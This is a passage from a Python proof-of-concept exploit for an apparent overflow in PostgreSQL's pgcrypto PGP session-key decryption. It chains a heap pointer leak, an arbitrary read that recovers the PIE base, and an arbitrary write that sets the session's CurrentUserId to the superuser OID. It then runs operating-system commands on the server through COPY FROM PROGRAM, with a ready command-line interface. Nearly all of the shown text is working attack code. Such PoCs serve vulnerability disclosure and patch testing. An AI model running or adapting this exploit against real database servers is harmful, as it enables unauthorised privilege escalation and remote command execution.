            has been overwritten. Its output is printed to stdout.
        use_gdb: forwarded only to the final execute_sql() call (stage 6).
            The other queries are unaffected: stage 5 reads pass
            use_gdb=False, and stage 2 uses execute_sql()'s default.

    Returns:
        None. Diagnostics go to stderr. The function returns early when a
        stage fails: no leaked pointer, no PIE candidates, CurrentUserId
        missing from the symbols, or no candidate matching the expected OID.
    """
    # Stage 1: Leak mdst->data heap pointer via corrupted pfree() error
    leaked_ptr = leak_mdst_pointer(rsa, conn_params)
    if leaked_ptr is None:
        return

    # Stage 2: Overwrite mdst->data with (leaked_ptr - 0x10000) to perform
    # an arbitrary read of heap memory just before our buffer. This region
    # may contain stale PIE code pointers from earlier allocations.
    print("\n### === STAGE 2: exploit with controlled pointer ===\n", file=sys.stderr)
    msg, key = generate_payload(rsa, 'exploit', leaked_ptr)
    sql = build_sql(msg, key)
    result = execute_sql(sql, conn_params)
    # Stage 3: Scan the leaked hex dump for non-heap addresses that look
    # like code pointers (>= 0x500000000000, not matching heap region).
    leaked_addrs = scan_for_pointers(result, leaked_ptr)

    # Stage 4: Resolve PIE base by matching leaked addresses against ELF
    # symbol offsets. Each (addr - sym_offset) that is page-aligned gets
    # a vote. Filter to 10+ vote candidates, pick the smallest base (PIE
    # is the lowest-mapped ELF), sort by votes descending.
    # NOTE(review): the ordering of `votes` is decided by resolve_pie_base()
    # (not visible here). Both the display loop and the stage 5 loop take
    # the first entries, so they assume the likeliest base comes first.
    print(f"### Loading symbols from {binary_path}...", file=sys.stderr)
    symbols = load_symbols(binary_path)
    print(f"### Loaded {len(symbols)} symbols", file=sys.stderr)
    votes = resolve_pie_base(leaked_addrs, symbols)
    # Show at most the first 10 candidates. This runs before the empty
    # check, which is harmless: an empty `votes` prints nothing.
    for base, count in list(votes.items())[:10]:
        print(f"###   PIE candidate: 0x{base:016x} ({count} votes)", file=sys.stderr)
    if not votes:
        print(f"### No PIE candidates", file=sys.stderr)
        return

    # Offset of CurrentUserId within the binary. Adding a candidate base
    # gives its runtime address.
    current_user_offset = find_symbol_offset(symbols, 'CurrentUserId')
    if current_user_offset is None:
        print(f"### ERROR: CurrentUserId not found in symbols", file=sys.stderr)
        return

    # OID of the role this session connects as. A read of CurrentUserId
    # through the correct base must return exactly this value.
    expected_oid = query_expected_oid(conn_params)
    print(f"### Expected CurrentUserId OID: {expected_oid}", file=sys.stderr)

    # Stage 5: Validate PIE candidates by performing an arbitrary read of
    # CurrentUserId at (candidate_base + current_user_offset). If the read
    # value matches our session's known OID, we've found the correct base.
    # Only the first 5 candidates are tried. Each attempt is a separate
    # query issued by test_pie_candidate().
    print(f"\n### === Stage 5: reading CurrentUserId to validate PIE base ===\n", file=sys.stderr)
    confirmed_base = None
    for base, _count in list(votes.items())[:5]:
        confirmed_base = test_pie_candidate(rsa, conn_params, base,
                                            current_user_offset, expected_oid)
        if confirmed_base is not None:
            break

    if confirmed_base is None:
        print(f"\n### WARNING: no candidate matched expected OID {expected_oid}", file=sys.stderr)
        return

    # Stage 6+7: Overwrite CurrentUserId to 10 (superuser OID) and execute command.
    #
    # We use target_addr = current_user_addr - 4 to account for SET_VARSIZE
    # in pgp_pgsql.c:533-534 which writes the output bytea length into the
    # first 4 bytes of the buffer. The decrypted data (p32(10) = OID 10,
    # the bootstrap superuser ID) lands at current_user_addr, giving our
    # session superuser privileges.
    #
    # Once CurrentUserId is overwritten, we can use COPY FROM PROGRAM to
    # execute arbitrary shell commands on the PostgreSQL server.
    print(f"\n### CONFIRMED PIE base: 0x{confirmed_base:016x}", file=sys.stderr)
    current_user_addr = confirmed_base + current_user_offset
    print(f"### CurrentUserId = 0x{current_user_addr:016x}", file=sys.stderr)
    msg = build_arb_write_payload(rsa, leaked_ptr, current_user_addr - 0x4)
    key = build_key_data(rsa)
    sql = build_sql(msg, key)
    # ret_conn=True keeps the connection that ran the overwrite. Presumably
    # the write only affects the backend serving this session, so the
    # follow-up queries must reuse it.
    # NOTE(review): conn is not closed if any query below raises; consider
    # wrapping the rest of this function in try/finally.
    conn = execute_sql(sql, conn_params, use_gdb=use_gdb, ret_conn=True)
    cur = conn.cursor()
    # Re-read the role OID on the same connection to show the overwrite's effect.
    cur.execute("SELECT current_user::regrole::oid;")
    changed_oid = cur.fetchone()[0]
    print(f"### CurrentUserId OID Changed From {expected_oid}, To: {changed_oid}", file=sys.stderr)
    print(f"### Executing: {cmd} ...", file=sys.stderr)
    output = execute_privileged_command(conn, cmd)
    # Command output is the only thing written to stdout; diagnostics use stderr.
    print(output)
    conn.close()


def main():
    """
    Command-line entry point.

    Parses the connection and target options, generates a fresh 3072-bit
    RSA key pair, and hands everything to run_exploit().

    NOTE(review): the --binary default is a developer-specific path. Pass
    --binary explicitly when running on any other machine.
    """
    cli = argparse.ArgumentParser(description="PGP session key overflow PoC")
    option = cli.add_argument
    option('--dbname', help='PostgreSQL database to connect to')
    option('--host', default='localhost', help='Database host')
    option('--port', type=int, default=5432, help='Database port')
    option('--user', default='postgres', help='Database user')
    option('--password', default='', help='Database password')
    option('--gdb', action='store_true',
           help='Attach GDB in a tmux pane at the overflow')
    option('--binary', default='/home/varik/projects/pg/pgsql/bin/postgres',
           help='Path to postgres binary for symbol matching')
    option('--cmd', default='id',
           help='OS command to execute after successful exploit (default: id)')
    opts = cli.parse_args()

    rsa_bits = 3072
    print(f"### Using RSA key size: {rsa_bits} bits", file=sys.stderr)
    rsa = generate_rsa_keypair(rsa_bits)

    run_exploit(rsa, conn_params_from_args(opts), opts.binary, opts.cmd, opts.gdb)


# Run the PoC only when executed as a script, not when imported.
if __name__ == "__main__":
    main()